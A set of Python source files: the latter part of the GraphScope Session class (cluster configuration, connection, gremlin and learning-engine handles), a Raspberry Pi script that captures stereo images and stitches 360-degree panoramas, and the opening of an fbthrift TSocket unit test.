Minimum number of memory request for graphmanager container. Defaults to '4Gi'.
k8s_mars_worker_cpu (float, optional):
Minimum number of CPU cores request for mars worker container. Defaults to 0.5.
k8s_mars_worker_mem (str, optional):
Minimum number of memory request for mars worker container. Defaults to '4Gi'.
k8s_mars_scheduler_cpu (float, optional):
Minimum number of CPU cores request for mars scheduler container. Defaults to 0.5.
k8s_mars_scheduler_mem (str, optional):
Minimum number of memory request for mars scheduler container. Defaults to '2Gi'.
with_mars (bool, optional):
Launch graphscope with mars. Defaults to False.
k8s_volumes (dict, optional): A dict of k8s volume which represents a directory containing data, accessible to the
containers in a pod. Defaults to {}.
For example, you can mount host path with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {
"path": "<path>",
"type": "Directory"
},
"mounts": [
{
"mountPath": "<path1>"
},
{
"mountPath": "<path2>"
}
]
}
}
Or you can mount PVC with:
k8s_volumes = {
"my-data": {
"type": "persistentVolumeClaim",
"field": {
"claimName": "your-pvc-name"
},
"mounts": [
{
"mountPath": "<path1>"
}
]
}
}
Also, you can mount a single volume with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {xxx},
"mounts": {
"mountPath": "<path1>"
}
}
}
timeout_seconds (int, optional): For waiting service ready (or waiting for delete if
k8s_waiting_for_delete is True).
dangling_timeout_seconds (int, optional): After seconds of client disconnect,
coordinator will kill this graphscope instance. Defaults to 600.
Expect this value to be greater than 5 (heartbeat interval).
Disable dangling check by setting -1.
k8s_waiting_for_delete (bool, optional): Waiting for service delete or not. Defaults to False.
**kw (dict, optional): Other optional parameters will be put to :code:`**kw`.
- k8s_minikube_vm_driver: Deprecated.
- k8s_client_config (dict, optional):
Provide configurable parameters for connecting to remote k8s,
which strongly relies on the `kube_config.new_client_from_config` function.
eg: {"config_file": "~/.kube/config", "context": None, "persist_config": True}
config_file: Name of the kube-config file.
context: set the active context. If is set to None, current_context from config file will be used.
persist_config: If True, config file will be updated when changed(e.g GCP token refresh).
- log_level: Deprecated.
Move this param as a global configuration. Set via `graphscope.set_option(log_level='DEBUG')`
- show_log: Deprecated.
Move this param as a global configuration.Set via `graphscope.set_option(show_log=True)`
- k8s_vineyard_shared_mem: Deprecated.
Please use vineyard_shared_mem instead.
Raises:
TypeError: If the given argument combination is invalid and cannot be used to create
a GraphScope session.
"""
num_workers = int(num_workers)
self._config_params = {}
self._accessable_params = (
"addr",
"cluster_type",
"num_workers",
"preemptive",
"k8s_namespace",
"k8s_service_type",
"k8s_gs_image",
"k8s_etcd_image",
"k8s_image_pull_policy",
"k8s_image_pull_secrets",
"k8s_gie_graph_manager_image",
"k8s_zookeeper_image",
"k8s_coordinator_cpu",
"k8s_coordinator_mem",
"k8s_etcd_num_pods",
"k8s_etcd_cpu",
"k8s_etcd_mem",
"k8s_zookeeper_cpu",
"k8s_zookeeper_mem",
"k8s_gie_graph_manager_cpu",
"k8s_gie_graph_manager_mem",
"k8s_vineyard_daemonset",
"k8s_vineyard_cpu",
"k8s_vineyard_mem",
"vineyard_shared_mem",
"k8s_engine_cpu",
"k8s_engine_mem",
"k8s_mars_worker_cpu",
"k8s_mars_worker_mem",
"k8s_mars_scheduler_cpu",
"k8s_mars_scheduler_mem",
"with_mars",
"k8s_volumes",
"k8s_waiting_for_delete",
"timeout_seconds",
"dangling_timeout_seconds",
)
saved_locals = locals()
for param in self._accessable_params:
self._config_params[param] = saved_locals[param]
# parse config, which should be a path to config file, or dict
# config has highest priority
if isinstance(config, dict):
self._config_params.update(config)
elif isinstance(config, str):
self._load_config(config, False)
elif DEFAULT_CONFIG_FILE:
self._load_config(DEFAULT_CONFIG_FILE)
# update other optional params
self._config_params.update(kw)
# initial setting of cluster_type
self._cluster_type = self._parse_cluster_type()
# mars cannot work with run-on-local mode
if self._cluster_type == types_pb2.HOSTS and self._config_params["with_mars"]:
raise NotImplementedError(
"Mars cluster cannot be launched along with local GraphScope deployment"
)
# deprecated params handle
if "show_log" in kw:
warnings.warn(
"The `show_log` parameter has been deprecated and has no effect, "
"please use `graphscope.set_option(show_log=%s)` instead."
% kw.pop("show_log", None),
category=DeprecationWarning,
)
if "log_level" in kw:
warnings.warn(
"The `log_level` parameter has been deprecated and has no effect, "
"please use `graphscope.set_option(log_level=%r)` instead."
% kw.pop("show_log", None),
category=DeprecationWarning,
)
if "k8s_vineyard_shared_mem" in kw:
warnings.warn(
"The `k8s_vineyard_shared_mem` has benn deprecated and has no effect, "
"please use `vineyard_shared_mem` instead."
% kw.pop("k8s_vineyard_shared_mem", None),
category=DeprecationWarning,
)
# update k8s_client_config params
self._config_params["k8s_client_config"] = kw.pop("k8s_client_config", {})
# There should be no more custom keyword arguments.
if kw:
raise ValueError("Not recognized value: ", list(kw.keys()))
if self._config_params["addr"]:
logger.info(
"Connecting graphscope session with address: %s",
self._config_params["addr"],
)
else:
logger.info(
"Initializing graphscope session with parameters: %s",
self._config_params,
)
self._closed = False
# coordinator service endpoint
self._coordinator_endpoint = None
self._launcher = None
self._heartbeat_sending_thread = None
self._grpc_client = None
self._session_id = None # unique identifier across sessions
# engine config:
#
# {
# "experiment": "ON/OFF",
# "vineyard_socket": "...",
# "vineyard_rpc_endpoint": "..."
# }
self._engine_config = None
# interactive instance related graph map
self._interactive_instance_dict = {}
# learning engine related graph map
self._learning_instance_dict = {}
self._default_session = None
atexit.register(self.close)
# create and connect session
with CaptureKeyboardInterrupt(self.close):
self._connect()
self._disconnected = False
# heartbeat
self._heartbeat_interval_seconds = 5
self._heartbeat_sending_thread = threading.Thread(
target=self._send_heartbeat, args=()
)
self._heartbeat_sending_thread.daemon = True
self._heartbeat_sending_thread.start()
def __repr__(self):
return str(self.info)
def __str__(self):
return repr(self)
@property
def session_id(self):
return self._session_id
def _load_config(self, path, slient=True):
config_path = os.path.expandvars(os.path.expanduser(path))
try:
with open(config_path, "r") as f:
data = json.load(f)
self._config_params.update(data)
except Exception as exp: # noqa
if not slient:
raise exp
def _parse_cluster_type(self):
if self._config_params["addr"] is not None:
# get the cluster type after connecting
return types_pb2.UNDEFINED
else:
if self._config_params["cluster_type"] == "hosts":
self._run_on_local()
return types_pb2.HOSTS
elif self._config_params["cluster_type"] == "k8s":
return types_pb2.K8S
else:
raise ValueError("Expect hosts or k8s of cluster_type parameter")
@property
def engine_config(self):
"""Show the engine configration associated with session in json format."""
return self._engine_config
@property
def info(self):
"""Show all resources info associated with session in json format."""
info = {}
if self._closed:
info["status"] = "closed"
elif self._grpc_client is None or self._disconnected:
info["status"] = "disconnected"
else:
info["status"] = "active"
if self._cluster_type == types_pb2.K8S:
info["type"] = "k8s"
info["engine_hosts"] = ",".join(self._pod_name_list)
info["namespace"] = self._config_params["k8s_namespace"]
else:
info["type"] = "hosts"
info["engine_hosts"] = self._engine_config["engine_hosts"]
info["cluster_type"] = str(self._cluster_type)
info["session_id"] = self.session_id
info["num_workers"] = self._config_params["num_workers"]
info["coordinator_endpoint"] = self._coordinator_endpoint
info["engine_config"] = self._engine_config
return info
def _send_heartbeat(self):
while not self._closed:
if self._grpc_client:
try:
self._grpc_client.send_heartbeat()
except GRPCError as exc:
logger.warning(exc)
self._disconnected = True
else:
self._disconnected = False
time.sleep(self._heartbeat_interval_seconds)
def close(self):
"""Closes this session.
This method frees all resources associated with the session.
"""
if self._closed:
return
self._closed = True
self._coordinator_endpoint = None
self._deregister_default()
if self._heartbeat_sending_thread:
self._heartbeat_sending_thread.join(
timeout=self._heartbeat_interval_seconds
)
self._heartbeat_sending_thread = None
self._disconnected = True
# close all interactive instances
for instance in self._interactive_instance_dict.values():
try:
if instance is not None:
instance.close()
except InteractiveEngineInternalError:
pass
self._interactive_instance_dict.clear()
# close all learning instances
for instance in self._learning_instance_dict.values():
try:
if instance is not None:
instance.close()
except LearningEngineInternalError:
pass
self._learning_instance_dict.clear()
if self._grpc_client:
self._grpc_client.close()
self._grpc_client = None
_session_dict.pop(self._session_id, None)
# clean up
if self._config_params["addr"] is None:
if self._launcher:
self._launcher.stop()
self._pod_name_list = []
def _close_interactive_instance(self, instance):
"""Close a interactive instance."""
if self._grpc_client:
self._grpc_client.close_interactive_engine(instance.object_id)
self._interactive_instance_dict[instance.object_id] = None
def _close_learning_instance(self, instance):
"""Close a learning instance."""
if self._grpc_client:
self._grpc_client.close_learning_engine(instance.object_id)
self._learning_instance_dict[instance.object_id] = None
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
def as_default(self):
"""Obtain a context manager that make this object as default session.
This method is used when a Session is constructed, which will immediately
install self as a default session.
Raises:
ValueError: If default session exist in current context.
Returns:
A context manager using this session as the default session.
"""
if not _default_session_stack.is_cleared():
raise ValueError(
"A default session is already active. You must explicitly call Session.close()."
)
# session context manager
self._default_session = default_session(self)
self._default_session.__enter__()
def _deregister_default(self):
"""Remove self from the default session stack."""
if self._default_session:
self._default_session.__exit__(None, None, None)
self._default_session = None
def run(self, fetch):
"""Run operations of `fetch`.
Args:
fetch: :class:`Operation`
Raises:
RuntimeError:
Client disconnect to the service. Or run on a closed session.
ValueError:
If fetch is not a instance of :class:`Operation`. Or
the fetch has been evaluated.
InvalidArgumentError:
Not recognized on output type.
Returns:
Different values for different output types of :class:`Operation`
"""
# prepare names to run and fetch
if hasattr(fetch, "op"):
fetch = fetch.op
if not isinstance(fetch, Operation):
raise ValueError("Expect a `Operation`")
if fetch.output is not None:
raise ValueError("The op <%s> are evaluated duplicated." % fetch.key)
# convert to list to be compatible with rpc client method signature
fetch_ops = [fetch]
dag = op_def_pb2.DagDef()
for op in fetch_ops:
dag.op.extend([copy.deepcopy(op.as_op_def())])
if self._closed:
raise RuntimeError("Attempted to use a closed Session.")
if not self._grpc_client:
raise RuntimeError("Session disconnected.")
# execute the query
try:
response = self._grpc_client.run(dag)
except FatalError:
self.close()
raise
check_argument(
len(fetch_ops) == 1, "Cannot execute multiple ops at the same time"
)
return self._parse_value(fetch_ops[0], response)
def _parse_value(self, op, response: message_pb2.RunStepResponse):
# attach an output to op, indicating the op is already run.
op.set_output(response.metrics)
# if loads a arrow property graph, will return {'object_id': xxxx}
if op.output_types == types_pb2.GRAPH:
return response.graph_def
if op.output_types == types_pb2.APP:
return response.result.decode("utf-8")
if op.output_types in (
types_pb2.RESULTS,
types_pb2.VINEYARD_TENSOR,
types_pb2.VINEYARD_DATAFRAME,
):
return response.result.decode("utf-8")
if op.output_types in (types_pb2.TENSOR, types_pb2.DATAFRAME):
return response.result
else:
raise InvalidArgumentError(
"Not recognized output type: %s" % op.output_types
)
def _connect(self):
if self._config_params["addr"] is not None:
# try connect to exist coordinator
self._coordinator_endpoint = self._config_params["addr"]
elif self._cluster_type == types_pb2.K8S:
if (
self._config_params["k8s_etcd_image"] is None
or self._config_params["k8s_gs_image"] is None
):
raise K8sError("None image found.")
if isinstance(
self._config_params["k8s_client_config"],
kube_client.api_client.ApiClient,
):
api_client = self._config_params["k8s_client_config"]
else:
api_client = kube_config.new_client_from_config(
**self._config_params["k8s_client_config"]
)
self._launcher = KubernetesClusterLauncher(
api_client=api_client,
**self._config_params,
)
elif (
self._cluster_type == types_pb2.HOSTS
and isinstance(self._config_params["hosts"], list)
and len(self._config_params["hosts"]) != 0
and self._config_params["num_workers"] > 0
):
# lanuch coordinator with hosts
self._launcher = HostsClusterLauncher(
**self._config_params,
)
else:
raise RuntimeError("Session initialize failed.")
# launching graphscope service
if self._launcher is not None:
self._launcher.start()
self._coordinator_endpoint = self._launcher.coordinator_endpoint
# waiting service ready
self._grpc_client = GRPCClient(self._coordinator_endpoint)
self._grpc_client.waiting_service_ready(
timeout_seconds=self._config_params["timeout_seconds"],
)
# connect and fetch logs from rpc server
try:
(
self._session_id,
self._cluster_type,
self._engine_config,
self._pod_name_list,
self._config_params["num_workers"],
self._config_params["k8s_namespace"],
) = self._grpc_client.connect(
cleanup_instance=not bool(self._config_params["addr"]),
dangling_timeout_seconds=self._config_params[
"dangling_timeout_seconds"
],
)
# fetch logs
if self._config_params["addr"] or self._cluster_type == types_pb2.K8S:
self._grpc_client.fetch_logs()
_session_dict[self._session_id] = self
except Exception:
self.close()
raise
def get_config(self):
"""Get configuration of the session."""
return self._config_params
def g(self, incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
return Graph(self, incoming_data, oid_type, directed, generate_eid)
def load_from(self, *args, **kwargs):
"""Load a graph within the session.
See more information in :meth:`graphscope.load_from`.
"""
with default_session(self):
return graphscope.load_from(*args, **kwargs)
def _run_on_local(self):
self._config_params["hosts"] = ["localhost"]
self._config_params["port"] = None
self._config_params["vineyard_socket"] = ""
def _get_gl_handle(self, graph):
"""Dump a handler for GraphLearn for interaction.
Fields in :code:`schema` are:
+ the name of node type or edge type
+ whether the graph is weighted graph
+ whether the graph is labeled graph
+ the number of int attributes
+ the number of float attributes
+ the number of string attributes
An example of the graph handle:
.. code:: python
{
"server": "127.0.0.1:8888,127.0.0.1:8889",
"client_count": 1,
"vineyard_socket": "/var/run/vineyard.sock",
"vineyard_id": 13278328736,
"node_schema": [
"user:false:false:10:0:0",
"item:true:false:0:0:5"
],
"edge_schema": [
"user:click:item:true:false:0:0:0",
"user:buy:item:true:true:0:0:0",
"item:similar:item:false:false:10:0:0"
],
"node_attribute_types": {
"person": {
"age": "i",
"name": "s",
},
},
"edge_attribute_types": {
"knows": {
"weight": "f",
},
},
}
The handle can be decoded using:
.. code:: python
base64.b64decode(handle.encode('ascii')).decode('ascii')
Note that the ports are selected from a range :code:`(8000, 9000)`.
Args:
graph (:class:`Graph`): A Property Graph.
client_number (int): Number of client.
Returns:
str: Base64 encoded handle
Raises:
InvalidArgumentError: If the graph is not loaded, or graph_type isn't
`ARROW_PROPERTY`.
"""
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
if not graph.graph_type == types_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
def group_property_types(props):
weighted, labeled, i, f, s, attr_types = "false", "false", 0, 0, 0, {}
for prop in props:
if prop.type in [types_pb2.STRING]:
s += 1
attr_types[prop.name] = "s"
elif prop.type in (types_pb2.FLOAT, types_pb2.DOUBLE):
f += 1
attr_types[prop.name] = "f"
else:
i += 1
attr_types[prop.name] = "i"
if prop.name == "weight":
weighted = "true"
elif prop.name == "label":
labeled = "true"
return weighted, labeled, i, f, s, attr_types
node_schema, node_attribute_types = [], dict()
for label in graph.schema.vertex_labels:
weighted, labeled, i, f, s, attr_types = group_property_types(
graph.schema.get_vertex_properties(label)
)
node_schema.append(
"{}:{}:{}:{}:{}:{}".format(label, weighted, labeled, i, f, s)
)
node_attribute_types[label] = attr_types
edge_schema, edge_attribute_types = [], dict()
for label in graph.schema.edge_labels:
weighted, labeled, i, f, s, attr_types = group_property_types(
graph.schema.get_edge_properties(label)
)
for rel in graph.schema.get_relationships(label):
edge_schema.append(
"{}:{}:{}:{}:{}:{}:{}:{}".format(
rel[0], label, rel[1], weighted, labeled, i, f, s
)
)
edge_attribute_types[label] = attr_types
handle = {
"hosts": self.info["engine_hosts"],
"client_count": 1,
"vineyard_id": graph.vineyard_id,
"vineyard_socket": self._engine_config["vineyard_socket"],
"node_schema": node_schema,
"edge_schema": edge_schema,
"node_attribute_types": node_attribute_types,
"edge_attribute_types": edge_attribute_types,
}
handle_json_string = json.dumps(handle)
return base64.b64encode(handle_json_string.encode("utf-8")).decode("utf-8")
@set_defaults(gs_config)
def gremlin(self, graph, engine_params=None):
"""Get a interactive engine handler to execute gremlin queries.
Note that this method will be executed implicitly when a property graph created
and cache a instance of InteractiveQuery in session if `initializing_interactive_engine`
is True. If you want to create a new instance under the same graph by different params,
you should close the instance first.
.. code:: python
>>> # close and recreate InteractiveQuery.
>>> interactive_query = sess.gremlin(g)
>>> interactive_query.close()
>>> interactive_query = sess.gremlin(g, engine_params={"xxx":"xxx"})
Args:
graph (:class:`Graph`): Use the graph to create interactive instance.
engine_params (dict, optional): Configure startup parameters of interactive engine.
You can also configure this param by `graphscope.set_option(engine_params={})`.
See a list of configurable keys in
`interactive_engine/deploy/docker/dockerfile/executor.vineyard.properties`
Raises:
InvalidArgumentError: :code:`graph` is not a property graph or unloaded.
Returns:
:class:`InteractiveQuery`
"""
# self._interactive_instance_dict[graph.vineyard_id] will be None if
# InteractiveQuery closed
if (
graph.vineyard_id in self._interactive_instance_dict
and self._interactive_instance_dict[graph.vineyard_id] is not None
):
interactive_query = self._interactive_instance_dict[graph.vineyard_id]
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
elif interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(interactive_query.error_msg)
else:
# Initializing.
# while True is ok, as the status is either running or failed eventually after timeout.
while True:
time.sleep(1)
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
elif interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(
interactive_query.error_msg
)
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
if not graph.graph_type == types_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
interactive_query = InteractiveQuery(session=self, object_id=graph.vineyard_id)
self._interactive_instance_dict[graph.vineyard_id] = interactive_query
if engine_params is not None:
engine_params = {
str(key): str(value) for key, value in engine_params.items()
}
else:
engine_params = {}
try:
response = self._grpc_client.create_interactive_engine(
object_id=graph.vineyard_id,
schema_path=graph.schema_path,
gremlin_server_cpu=gs_config.k8s_gie_gremlin_server_cpu,
gremlin_server_mem=gs_config.k8s_gie_gremlin_server_mem,
engine_params=engine_params,
)
except Exception as e:
interactive_query.status = InteractiveQueryStatus.Failed
interactive_query.error_msg = str(e)
raise InteractiveEngineInternalError(str(e)) from e
else:
interactive_query.set_frontend(
front_ip=response.frontend_host, front_port=response.frontend_port
)
interactive_query.status = InteractiveQueryStatus.Running
graph._attach_interactive_instance(interactive_query)
return interactive_query
def learning(self, graph, nodes=None, edges=None, gen_labels=None):
"""Start a graph learning engine.
Args:
nodes (list): The node types that will be used for gnn training.
edges (list): The edge types that will be used for gnn training.
gen_labels (list): Extra node and edge labels on original graph for gnn training.
Returns:
`graphscope.learning.Graph`: An instance of `graphscope.learning.Graph`
that could be feed to the learning engine.
"""
if (
graph.vineyard_id in self._learning_instance_dict
and self._learning_instance_dict[graph.vineyard_id] is not None
):
return self._learning_instance_dict[graph.vineyard_id]
if sys.platform != "linux" and sys.platform != "linux2":
raise RuntimeError(
"The learning engine currently supports Linux only, doesn't support %s"
% sys.platform
)
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
if not graph.graph_type == types_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
from graphscope.learning.graph import Graph as LearningGraph
handle = self._get_gl_handle(graph)
config = LearningGraph.preprocess_args(handle, nodes, edges, gen_labels)
config = base64.b64encode(json.dumps(config).encode("utf-8")).decode("utf-8")
endpoints = self._grpc_client.create_learning_engine(
graph.vineyard_id, handle, config
)
handle = json.loads(base64.b64decode(handle.encode("utf-8")).decode("utf-8"))
handle["server"] = endpoints
handle["client_count"] = 1
learning_graph = LearningGraph(handle, config, graph.vineyard_id, self)
self._learning_instance_dict[graph.vineyard_id] = learning_graph
graph._attach_learning_instance(learning_graph)
return learning_graph
session = Session
def set_option(**kwargs):
"""Set the value of specified options.
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
- k8s_etcd_image
- k8s_gie_graph_manager_image
- k8s_zookeeper_image
- k8s_image_pull_policy
- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
kwargs: dict
kv pair of GraphScope config you want to set.
Raises:
ValueError: If no such option exists.
Returns: None
"""
# check exists
for k, v in kwargs.items():
if not hasattr(gs_config, k):
raise ValueError("No such option {} exists.".format(k))
for k, v in kwargs.items():
setattr(gs_config, k, v)
GSLogger.update()
def get_option(key):
"""Get the value of specified option.
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
- k8s_etcd_image
- k8s_gie_graph_manager_image
- k8s_zookeeper_image
- k8s_image_pull_policy
- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
key: str
Key of GraphScope config you want to get.
Raises:
ValueError: If no such option exists.
Returns: result: the value of the option
"""
if hasattr(gs_config, key):
return getattr(gs_config, key)
else:
raise ValueError("No such option {} exists.".format(key))
def default_session(session):
"""Python's :code:`with` handler for defining a default session.
This function provides a means of registering a session for handling
and code that need a default session calls.
The :code:`with` keyword to specify that code invocations within
the scope of a block should be executed by a particular session.
Args:
session: :class:`Session`
The session to be installed as the default session.
Returns:
A context manager for the default session.
"""
return _default_session_stack.get_controller(session)
def get_default_session():
"""Returns the default session for the current context.
Raises:
RuntimeError: Default session is not exist.
Returns:
The default :class:`Session`.
"""
return _default_session_stack.get_default()
def get_session_by_id(handle):
"""Return the session by handle."""
if handle not in _session_dict:
raise ValueError("Session not exists.")
return _session_dict.get(handle)
class _DefaultSessionStack(object):
"""A stack of objects for providing implicit defaults."""
def __init__(self):
super().__init__()
self.stack = []
def get_default(self):
if not self.stack:
raise RuntimeError("No default session found.")
return self.stack[-1]
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
self.stack.append(default)
try:
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
self.stack.remove(default)
_default_session_stack = _DefaultSessionStack() # pylint: disable=protected-access
def g(incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
return get_default_session().g(incoming_data, oid_type, directed, generate_eid)
|
take360.py | #!/usr/bin/env python
import os
import io
import time
import sys
from skimage import io
import signal
import struct
import subprocess
import threading
import numpy as np
import argparse
################################################################
# Initialise the Raspberry Pi video
################################################################
################################################################
# Either run the following command before running the script:
# sudo modprobe bcm2835-v4l2
# or add bcm2835-v4l2 to the /etc/modules file
################################################################
################################################################
# Image Parameters
################################################################
width = 2592
height = 1944
img_size = (width,height)
terminate = False
def signal_handling(signum,frame):
global terminate
terminate = True
###############################################################
class Take360(threading.Thread):
def __init__(self, input_directory, start_delay, timelapse_enabled, timelapse_period, timelapse_seconds):
self.input_directory = input_directory # Directory in which to save images
self.start_delay = start_delay # Delay before taking pictures
self.timelapse_enabled = timelapse_enabled # Enable the timelapse function
self.timelapse_period = timelapse_period # If timelapse enabled, the time gap between shots
self.timelapse_seconds = timelapse_seconds # If timelapse enabled, how long should it shoot for
self._stop = threading.Event()
print("Take360 Capture Initialisation Complete")
def start(self):
threading.Thread(target=self.update, args=()).start()
return self
def update(self):
print("Take360 Capture Starting")
# keep looping infinitely until the thread is stopped
print("Take360 Waiting for capture thread to start")
time.sleep(self.start_delay)
if self.timelapse_enabled:
# Calculate the number of images
image_count = int(self.timelapse_seconds / self.timelapse_period)
# Image counter for naming the files
counter = 0
print("Take360 Starting Capture Loop")
while True:
try:
if self.stopped():
return
################################################################
# PiCamera wouldn't produce the full size image
subprocess.run(["raspistill", "-3d", "sbs", "-o", self.input_directory+'{:07d}'.format(counter)+".jpg", "-w", str(width*2), "-h", str(height) ])
print("Capture "+'{:07d}'.format(counter))
counter += 1
# If timelapse
if self.timelapse_enabled:
# Has the timelapse finished
if counter >= image_count:
print("Capture completed")
print("Press Ctrl+c to exit.")
self.stop()
else:
time.sleep(self.timelapse_period)
else:
# Exit the loop
self.stop()
except KeyboardInterrupt as ki:
print("Take360 Capture Exiting Loop")
raise ki
else:
time.sleep(0)
def stop(self):
self._stop.set()
def stopped(self):
return self._stop.isSet()
################################################################
###############################################################
class Process360(threading.Thread):
def __init__(self, input_directory, output_directory):
self.input_directory = input_directory # Directory to look for images to process
self.output_directory = output_directory # directory to place processed images
self._stop = threading.Event()
print("Take360 Process Loop Initialisation Complete")
def start(self):
threading.Thread(target=self.update, args=()).start()
return self
def update(self):
print("Take360 Process Loop Starting")
# keep looping infinitely until the thread is stopped
while True:
files = os.listdir(self.input_directory)
try:
if self.stopped():
return
for file in files:
if file.endswith(".jpg"):
image = np.empty((height * width * 2 * 3), dtype=np.uint8)
image = io.imread(self.input_directory+file)
if image is not None:
image0 = image[0:height,0:width-1]
image1 = image[0:height,width:width*2-1]
# Create the tmp directory and save the images to it
if not os.path.isdir("./tmp/"):
os.mkdir("./tmp/")
io.imsave("./tmp/image0.jpg",image0)
io.imsave("./tmp/image1.jpg",image1)
# Create the hugin project file if it doesn't already exist
if not os.path.exists("project.pto"):
subprocess.run(["pto_gen", "--projection=2", "--fov=360", "-o", "project.pto", "./tmp/image0.jpg", "./tmp/image1.jpg" ])
subprocess.run(["pto_template", "--output=project.pto", "--template=stereopi-template.pto", "project.pto"])
# Process the images into a 360 degree panorama using hugin-tools
subprocess.run(["hugin_executor", "--stitching", "--prefix=output", "project.pto"])
# Move the output to the processed files folder and rename it
os.rename("output.jpg",self.output_directory+file)
# Clean up the tmp folder and delete it
os.remove("./tmp/image0.jpg")
os.remove("./tmp/image1.jpg")
os.rmdir("./tmp/")
# The file is processed so move it to the processed folder
os.rename(self.input_directory+file,self.input_directory+"processed/"+file)
print("Take360 Process Loop waiting for file to process.")
print("Press Ctrl+c to exit.")
time.sleep(0)
except KeyboardInterrupt as ki:
print("Exiting Take360 Process Loop")
raise ki
else:
time.sleep(0)
return
def stop(self):
self._stop.set()
def stopped(self):
return self._stop.isSet()
################################################################
def main(args):
if sys.version_info.major < 3 or (sys.version_info.major and sys.version_info.minor < 5):
raise Exception("Must be using Python 3.5 or higher")
# initialise
# Capture CTRL+C
signal.signal(signal.SIGINT,signal_handling)
# See if there's any command line arguments to process
parser = argparse.ArgumentParser()
parser.add_argument('-i','--input_dir', nargs=1, type=str, required=True, help='Directory to place shots into. Shots will be moved into a subfolder called processed after processing.')
parser.add_argument('-o','--output_dir', nargs=1, type=str, required=True, help='Directory for processed images to be placed into.')
parser.add_argument('-d','--start_delay', nargs=1, type=int, required=False, default=[0], help='Delay before shooting starts.')
parser.add_argument('-t','--timelapse', required=False, action='store_true', help='Enable timelapse mode.')
parser.add_argument('-p','--period', nargs=1, type=int, required=False, default=[2], help='Seconds between shots (minimum of 2 seconds).')
parser.add_argument('-s','--seconds', nargs=1, type=int, required=False, default=[0], help='Number of seconds to shoot timelapse.')
parser.add_argument('--no_capture', required=False, action='store_true', help='Capture images disabled. Can be disabled to run shooting and processing seperately.')
parser.add_argument('--no_process', required=False, action='store_true', help='Process images disabled. Can be disabled to run shooting and processing seperately.')
args = parser.parse_args()
input_directory = args.input_dir[0] # Directory to place shots into. Shots will be moved into a subfolder called processed after processing
output_directory = args.output_dir[0] # Directory for processed images to be placed into
start_delay = int(args.start_delay[0]) # Delay before shooting starts
timelapse_enabled = bool(args.timelapse) # Enable timelapse mode
timelapse_period = int(args.period[0]) # Seconds between shots
timelapse_seconds = int(args.seconds[0]) # Number of seconds to shoot timelapse
no_capture = bool(args.no_capture) # Capture images enabled. Can be disabled to run shooting and processing seperately
no_processing = bool(args.no_process) # Process images enabled. Can be disabled to run shooting and processing seperately
if timelapse_enabled:
if timelapse_period >= timelapse_seconds:
print("Timelpase period must be less than Timelapse seconds")
os._exit(1)
# Make sure the directory names en in /
if not input_directory.endswith("/"):
input_directory += "/"
if not output_directory.endswith("/"):
output_directory += "/"
# Create any directories we need
if not os.path.isdir(input_directory):
os.mkdir(input_directory)
if not os.path.isdir(input_directory+"processed/"):
os.mkdir(input_directory+"processed/")
if not os.path.isdir(output_directory):
os.mkdir(output_directory)
if not no_processing:
print("Start the processing thread")
process = Process360(input_directory, output_directory).start()
if not no_capture:
print("Start the capture thread")
capture = Take360(input_directory, start_delay, timelapse_enabled, timelapse_period, timelapse_seconds).start()
# Terminate if CTRL+C pressed
while not terminate:
time.sleep(1)
print("Stopping")
if not no_capture:
print("Closing Take360 Capture Loop")
capture.stop()
if not no_processing:
print("Closing Take360 Process Loop")
process.stop()
print("Stopped")
os._exit(0)
if __name__ == '__main__':
main(sys.argv)
################################################################
|
TSocketTest.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os.path
import socket
import tempfile
import threading
import time
import unittest
import nebula2.fbthrift.transport.TSocket as TSocket
import nebula2.fbthrift.transport.TTransport as TTransport
class TSocketTest(unittest.TestCase):
def test_usage_as_context_manager(self):
"""
Asserts that both TSocket and TServerSocket can be used with `with` and
that their resources are disposed of at the close of the `with`.
"""
text = b"hi" # sample text to send over the wire
with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
